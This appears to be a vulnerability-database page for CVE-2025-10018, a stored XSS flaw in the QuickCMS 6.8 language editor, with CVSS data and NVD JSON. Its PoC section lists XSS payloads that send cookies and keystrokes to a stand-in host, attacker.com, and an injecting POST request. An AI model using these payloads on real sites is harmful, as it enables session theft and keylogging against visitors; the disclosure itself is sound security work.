CVE-2025-10018

Description

QuickCMS is vulnerable to multiple Stored XSS in language editor functionality (languages). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed on every page. By default admin user is not able to add JavaScript into the website. The vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable.

CVSS Details

CVSS Score

4.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:* - VULNERABLE

QuickCMS 6.8 (已确认存在漏洞)

QuickCMS 其他版本 (可能受影响，尚未测试)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-10018 PoC - Stored XSS in QuickCMS Language Editor -->
<!-- This PoC demonstrates the stored XSS vulnerability in QuickCMS languages editor -->

<!-- Step 1: Login to QuickCMS admin panel with admin credentials -->
<!-- URL: /admin.php?p=languages -->

<!-- Step 2: Inject malicious JavaScript into language field -->
<!-- Example payload in language editor: -->
<script>
  // Steal session cookies
  fetch('https://attacker.com/steal?cookie=' + btoa(document.cookie))
</script>

<!-- Alternative payload - keylogger -->
<img src=x onerror='document.onkeypress=function(e){fetch("https://attacker.com/log?k="+e.key)}'>

<!-- Alternative payload - session hijacking -->
<script>
  document.location='https://attacker.com/cookie?c='+document.cookie
</script>

<!-- Step 3: Save the language modification -->
<!-- The malicious script is now stored and will execute on all pages -->

<!-- HTTP Request Example -->
POST /admin.php?p=languages&action=save HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=admin_session

id=1&key=site_name&value=<script>alert('XSS')</script>&lang=en

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10018
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10018
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10018/
[4] VulDB https://vuldb.com/cve/CVE-2025-10018
[5] https://cert.pl/posts/2025/11/CVE-2025-9982
[6] https://opensolution.org/cms-system-quick-cms.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10018", "sourceIdentifier": "[email protected]", "published": "2025-11-14T14:15:44.380", "lastModified": "2025-11-17T19:26:29.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QuickCMS is vulnerable to multiple Stored XSS in language editor functionality (languages). Malicious attacker with admin privileges can inject arbitrary HTML and JS into website, which will be rendered/executed on every page. By default admin user is not able to add JavaScript into the website.\n\nThe vendor was notified early about this vulnerability, but didn't respond with the details of vulnerability or vulnerable version range. Only version 6.8 was tested and confirmed as vulnerable, other versions were not tested and might also be vulnerable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensolution:quick.cms:6.8:*:*:*:*:*:*:*", "matchCriteriaId": "D38DD588-2254-48CA-922B-A803E730F60E"}]}]}], "references": [{"url": "https://cert.pl/posts/2025/11/CVE-2025-9982", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://opensolution.org/cms-system-quick-cms.html", "source": "[email protected]", "tags": ["Product"]}]}}